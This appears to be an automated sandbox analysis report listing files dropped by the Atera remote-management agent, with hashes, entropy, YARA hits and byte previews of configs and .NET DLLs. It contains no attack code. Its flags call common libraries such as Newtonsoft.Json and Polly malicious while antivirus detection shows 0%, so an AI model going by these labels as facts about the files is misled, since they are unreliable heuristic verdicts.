                                                                                                                                                                                                                                        SHA-256:C35A8B8AF7ECCB9BA68B129FF7F46EB1279229D637049F40761A697E9DFCD5A4
                                                                                                                                                                                                                                        SHA-512:0F77B35AC34C8E4655F7F1F4EBF1A86AA11F96C689E632DA8BE8A17CC69A9292878E0058DD9EA5FF7315DCDD8B34489F06E6DCBB365569E3BB80E81373792FC0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                        Entropy (8bit):3.5465935642949384
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhUv:Wm
                                                                                                                                                                                                                                        MD5:27AD88A291FC97D97FD773334DE4E487
                                                                                                                                                                                                                                        SHA1:04B5DB46F05E02E2EC94B8A0A3447EA41FA4089D
                                                                                                                                                                                                                                        SHA-256:4E7F8923223CB32E5D376EBC0C5361DD97DB201848590C4877D586723142B49F
                                                                                                                                                                                                                                        SHA-512:5B21A87E19D4E3D7A14DC05C815B8D06500695360AAD1F54D2D3713CF05F646E9E7D559551BFE2CC2CDEBCE29A1991BC80AB2B11DDF79A4033897B34DCA40521
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=17.14

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):93232
                                                                                                                                                                                                                                        Entropy (8bit):6.196023578677744
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:5Svbne0Q41qJ3n8JMW+0KcBLQhZV5M+5Nn0komH7yAfRS7Hxh:5S8UMW+BV5M+5Nn0kom/RSz
                                                                                                                                                                                                                                        MD5:BD539D820C8163E9E86E59B99ADEDD22
                                                                                                                                                                                                                                        SHA1:FF367525BA06F8B9E611A82CFD57411BA4FBD1FE
                                                                                                                                                                                                                                        SHA-256:04C547E06CA956DB2B929CC2B6B695A649FF0F82C52E56F2677A887E7D9616DE
                                                                                                                                                                                                                                        SHA-512:FEBB46D70A5466C85087BD4E42FBA81682CF398739F7EFEF43982C830CCFD6FCEC4613F0B5542951A463161C891EE9F378CD4D2B15B1659DCBC0E15A34BA677F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Atera.AgentPackage.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c.........." ..0..:..........^X... ...`....... ...............................F....`..................................X..O....`..8............D..0(...........V............................................... ............... ..H............text...d8... ...:.................. ..`.rsrc...8....`.......<..............@..@.reloc...............B..............@..B................@X......H.......|f..X............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tM...r...p((..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960415778826794
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:fBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUs:fBA/ZTvQD0XY0AJBSjRlXP36RMGx
                                                                                                                                                                                                                                        MD5:3DDA2732842FCAEEA0477F18D85CB584
                                                                                                                                                                                                                                        SHA1:D70016DF3F407CFE1BE6ACF63CC80A2B40F8212B
                                                                                                                                                                                                                                        SHA-256:EF3F8313AD94CFB9C2E8C95B54433F112918A0542C341763B19C0B2C6914A71D
                                                                                                                                                                                                                                        SHA-512:3403842EA1DF9F314EFF6E78F36F215A4E371B01B1C83345B7745737FABB092BDCFE63F78A29FB5FAD14825DA1C7AC286CC8BCA02B0FC3056620FE268D4FE6F9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ......Ee....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):833993
                                                                                                                                                                                                                                        Entropy (8bit):7.999644881255343
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:24576:peRqTiLR3omp/AAzr5nxL2CP+sZ4tgMfQo:p8nLR4WYA72CPPoKo
                                                                                                                                                                                                                                        MD5:9B1F97A41BFB95F148868B49460D9D04
                                                                                                                                                                                                                                        SHA1:768031D5E877E347A249DFDEAB7C725DF941324B
                                                                                                                                                                                                                                        SHA-256:09491858D849212847E4718D6CC8F2B1BC3CAA671CEB165CF522290B960262E4
                                                                                                                                                                                                                                        SHA-512:9C8929A78CB459F519ACE48DB494D710EFD588A19A7DBEA84F46D02563CC9615DB8AA78A020F08ECA6FA2B99473D15C8192A513B4DF8073AEF595040D8962AE4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-.....;9rX.9..........9...AgentPackageInternalPoller/AgentPackageInternalPoller.exe....0Z.......U........ee..Th8.............t.v.g....g......M.........c..K.`|.'1.W.g.;.W+.e.....D.."|...]-:.To.:.`B(.E{.T.?..z...&.....g.....1.,km8.....Y......WZm;..!.....k.....iA...~.zK..EW'.....p.A....Q6.~S......A.......6....h=C3N0y.$i....M...N....C......I.....UCp.p....x..WQ!.p..>.'N%.2Z.l.R8./...%Ew..T..yy.....q...U.nqH......".......n.6M..P.:t...t1..r...!9Z.N.X.s8.3.9V.a...m8....LpWS..O.8..R6..O.l....e|(..F...Og.h.0..,..Z.H....Rl..L.N.9.\...."4..%..A.<."..Iy...:..GBw_1......3.y.p...a...*...l..._.FI.Z.....+.L.....]Y.K|RM.Pf..in.........93+2.QMH.t......<...3.. ....2..!....t..)).I\.qw1.'..J...J3".K'rt.h.f+.I.7...q.MK......V.._!Q.].w..au.[.brv.T&..Lfm./..J.$.m...... t.u..uQ...L...\...M.Ihp.rG.J..C".....d.....;z..d....L.p.r.c7....q[2.e.........!(....Ld.....M..9...M....>EN&dY.]....>QUJ..N.+d.cr..].D.o.........?o.~@....@..D[...5.C.eP.a.....;..:.._v.....R

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):219696
                                                                                                                                                                                                                                        Entropy (8bit):5.943430076853408
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:It3Mf3ZwYUPEpbPwygJQetg0+BpU3I0toxhGf:2MfJPpjYN8hI
                                                                                                                                                                                                                                        MD5:01807774F043028EC29982A62FA75941
                                                                                                                                                                                                                                        SHA1:AFC25CF6A7A90F908C0A77F2519744F75B3140D4
                                                                                                                                                                                                                                        SHA-256:9D4727352BF6D1CCA9CBA16953EBD1BE360B9DF570FD7BA022172780179C251E
                                                                                                                                                                                                                                        SHA-512:33BD2B21DB275DC8411DA6A1C78EFFA6F43B34AFD2F57959E2931AA966EDEA46C78D7B11729955879889CBE8B81A8E3FB9D3F7E4988E3B7F309CBD1037E0DC02
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{..e.........."...0..&..........:D... ...`....@.. ..............................h)....`..................................C..O....`..d............2..0(...........B............................................... ............... ..H............text....$... ...&.................. ..`.rsrc...d....`.......(..............@..@.reloc...............0..............@..B.................D......H........@..$.......f.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ...x )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*..{....*..{ ...*..{!...*r.(......}......} .....}!...*..0..Y........u........L.,G(.....{.....{....o....,/(.....{ ....{ ...o....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):541
                                                                                                                                                                                                                                        Entropy (8bit):5.097123194334321
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdGp2VvOF9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdsIOvPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                        MD5:D0EFB0A6D260DBE5D8C91D94B77D7ACD
                                                                                                                                                                                                                                        SHA1:E33A8C642D2A4B3AF77E0C79671EAB5200A45613
                                                                                                                                                                                                                                        SHA-256:7D38534766A52326A04972A47CACA9C05E95169725D59AB4A995F8A498678102
                                                                                                                                                                                                                                        SHA-512:A3F1CFF570201B8944780CF475B58969332C6AF9BEA0A6231E59443B05FC96DF06A005FF05F78954DBE2FEC42DA207F6D26025AA558D0A30A36F0DF23A44A35C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhXWp:WBc
                                                                                                                                                                                                                                        MD5:DFDD2EB77BBB74518BAD98519A857D41
                                                                                                                                                                                                                                        SHA1:5F4F91D73EA620CDF0E5AC458E80B71412B1BB9F
                                                                                                                                                                                                                                        SHA-256:7655078305CC5B4F62569EF9868E1B04FCC491D33FDAD1F8E4610C038BCBAC8D
                                                                                                                                                                                                                                        SHA-512:481CDA97C03294EBAB036F99727828983C8D0E4C137AF05FDEA7FD296D11378904BACCE2D58D44F932A0BF7F2A30A9B44F4CBC05E253F132B1EF641F648C8DF0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=23.8

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentCommunication.Models.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):52272
                                                                                                                                                                                                                                        Entropy (8bit):6.300719339270839
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:5i8fXCGsSVh/2ixXxKFArYCJdshn9xvlOaEpYinAMxCuMr:5FaM2gS1y2F9Ob7HxCr
                                                                                                                                                                                                                                        MD5:9467F653980C1C37E4C64811BA27C976
                                                                                                                                                                                                                                        SHA1:68130FABBB50EAF5CFE2C355BA13B303DD373FB6
                                                                                                                                                                                                                                        SHA-256:821847799A2B7B3A6EC20BA61388AC87707D9C6865BD904A44DE5B033BD2EF29
                                                                                                                                                                                                                                        SHA-512:E72B7802256053589D889B2B7E74A2B53F328289A12CC0D4930D66410D00585C67B2C434512473CD2E74C8F2CB7685C2C34FCFC3DBA4A52399532CEB04153597
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... ..............................t.....`.................................2...O.......................0(..........@...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................f.......H...........x.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{ ...*"..} ...*..{!...*"..}!...*..{"...*"..}"...*..{#...*"..}#...*..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):96816
                                                                                                                                                                                                                                        Entropy (8bit):6.1801131806578455
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:hJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvC7Hxwx:hQUm2H5KTfOLgxFJjE50vksVUfPvCI
                                                                                                                                                                                                                                        MD5:F1B2303DD7E152BA70F3537EDB2E9638
                                                                                                                                                                                                                                        SHA1:7E359D4B9011449DABB7F8236F14851A346B5028
                                                                                                                                                                                                                                        SHA-256:8EE8B304339B6F87E79B117F605375AFFFCBABA290A1B41BB6B3C1A40E46767C
                                                                                                                                                                                                                                        SHA-512:A4DD48F1AFF528DADF9974ADA1740CE785823FB584F55191D008158FCFB11F9ADAD8EFF992B8FF761058706C1717E28FBC9C337CF39D4EE4FFAA529501CB3188
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0.d.........." ..0..H..........zf... ........... ..............................l.....`.................................(f..O.......8............R..0(...........d............................................... ............... ..H............text....F... ...H.................. ..`.rsrc...8............J..............@..@.reloc...............P..............@..B................\f......H........k..D............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\LastSyncDevicesTime.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):19
                                                                                                                                                                                                                                        Entropy (8bit):3.115834092163221
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:LvMVITRWn:QVITwn
                                                                                                                                                                                                                                        MD5:2619D3A876541175A4FDF5755CBC9CCC
                                                                                                                                                                                                                                        SHA1:FBC68BD9717602133354529D2EED3E5A9697C862
                                                                                                                                                                                                                                        SHA-256:C3B37CCB5B1686051F463693AFA58F16E19CDC8F8567EACF12D9B3E8E808E286
                                                                                                                                                                                                                                        SHA-512:DECA38391FCE94838BCED2445B8BED14F40920E4E0CF8D3AADE9CE60C3C42D594EA139BEAA4CCCE7230831B7FED3A6BB74B2F77216B9162DB8A5F6E1F0120669
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:17/12/2024 12:46:43

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\LiteDB.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):499760
                                                                                                                                                                                                                                        Entropy (8bit):6.056862695710082
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:HXv781Hpx+GfCdLr/jd9yyeEAHweiPofdyz7qd352SW8CdykAfqO:/76BfC5avfdyvc2SN
                                                                                                                                                                                                                                        MD5:3CE7E73DB6F575A0D382DDAA8E1A3C10
                                                                                                                                                                                                                                        SHA1:031C13652C540CA7F798D141D7C3333FB1C71618
                                                                                                                                                                                                                                        SHA-256:692185C37DB7505250E58CC55D6707FCB099315A7FF319A9CC92FD99C5F0EEA7
                                                                                                                                                                                                                                        SHA-512:5270E772613864BD223F31F89CFA500E56E7863967C58C503F92E193AF8C8CAF934B7755868EC21585A38E8D6D186A2DC5528A805A62A0BFA56B59E6506BFF81
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,..........." ..0..p............... ........... ....................................`.................................?...O....................x..0(..........t...T............................................ ............... ..H............text....n... ...p.................. ..`.rsrc................r..............@..@.reloc...............v..............@..B................s.......H.......(d...(...........................................................{J...*..{K...*V.(L.....}J.....}K...*...0..A........u;.......4.,/(M....{J....{J...oN...,.(O....{K....{K...oP...*.*.*. 8..z )UU.Z(M....{J...oQ...X )UU.Z(O....{K...oR...X*...0..b........r...p......%..{J......%q>....>...-.&.+...>...oS....%..{K......%q?....?...-.&.+...?...oS....(T...*2.(U...oV...*..-.rE..psW...z.(U....oX...oV...*:...(....(Y...*:...(....(Y...*N..{Z....o...+(Y...*z.{[....{Z....{\....s]...(^...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960733432365752
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:bBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUk:bBjk38WuBcAbwoA/BkjSHXP36RMGt
                                                                                                                                                                                                                                        MD5:2A9525F27730CBF9E7145AADE4CDA830
                                                                                                                                                                                                                                        SHA1:A6A99E02599656DE1C7F51B02C84BBA8AAE0346D
                                                                                                                                                                                                                                        SHA-256:29D0073080509DB7F3F20C47980A1347CC4139C5F2E26C9C160AE67CE5EECB6E
                                                                                                                                                                                                                                        SHA-512:DDDEEC7AA9D3F9E6187718564AE1A447FCAB12EC2DCBD26EDD87217B4815C274A6BAF90A027766FCC94815C762ED9BFA8D0DEF6C1B2F84279DED9C66852D381E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ...... .....`....................................O.......................0(.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Polly.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):277040
                                                                                                                                                                                                                                        Entropy (8bit):6.190626027944278
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:rSOIleacQlBh2YQMoIBhpq01TLvlj9b6gRZNsRYA:suQlBAMW0BvltxZ6B
                                                                                                                                                                                                                                        MD5:4ECF017FD71CC84A4CBAB7507B8634BE
                                                                                                                                                                                                                                        SHA1:2343F37490F9A11F5F0878A1553F0FAF504FE062
                                                                                                                                                                                                                                        SHA-256:871D9403D045F94FC433907E49B68894764FCAF81E12FBDE2AC7A08642DDA32C
                                                                                                                                                                                                                                        SHA-512:5FCB9BDA9C857BA1AD2EC0B19AD109AC54BAC91B8F8F00968560623C8AFD01FAEE1078F7C76010C7526A37C46EE0DB74A0E0DB151186F8FB220105F7091FA69B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..............'... ...@....... ..............................>.....@..................................&..O....@..L...............0(...`.......%..T............................................ ............... ..H............text........ ...................... ..`.rsrc...L....@......................@..@.reloc.......`......................@..B.................&......H.......L[......................`%......................................^.{....,.(:...z..}.....*^.{....,.(:...z..}.....*"..(?...*"..(@...*...0..,.......sp......}........q...s7...sj....{.....(....*.0..-.......sr......}........s...s7....ss....{.....(....*....0..(.......st......}........u...s7.....{.....(....*.0..'.......sv......}........w...s7...sj.....(....*B...ss.....(....*......(....*.0..'.......sx......}........y...s7...sj.....(....*F...ss......(....*....0..Z..........}....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):149552
                                                                                                                                                                                                                                        Entropy (8bit):6.059724018456156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:o/S+nps5/3oat9QrwQmUgs0giOBDQntBBGBBKBUkBBXBBgBBFBUABU1BB0BBBBgB:o/S+nps5/3f9Qrdd5EtBBGBBKBUkBBXh
                                                                                                                                                                                                                                        MD5:2FF31980FD256EF1B1E143D4699BB727
                                                                                                                                                                                                                                        SHA1:608A21DA2B243E63DAD9E36EE84BC38C921F8E77
                                                                                                                                                                                                                                        SHA-256:F34AD6FB7847A85ADBE1492C783233A8A32BB5E96972FA3738538CE20513F682
                                                                                                                                                                                                                                        SHA-512:2FEF83A7668D190297863592FBBC8E766042067138C3A163771CDCF1FB284BC8162EA6B7B958CB076B6AB654216B855324AE292F78931C47EDC33B52376943AD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
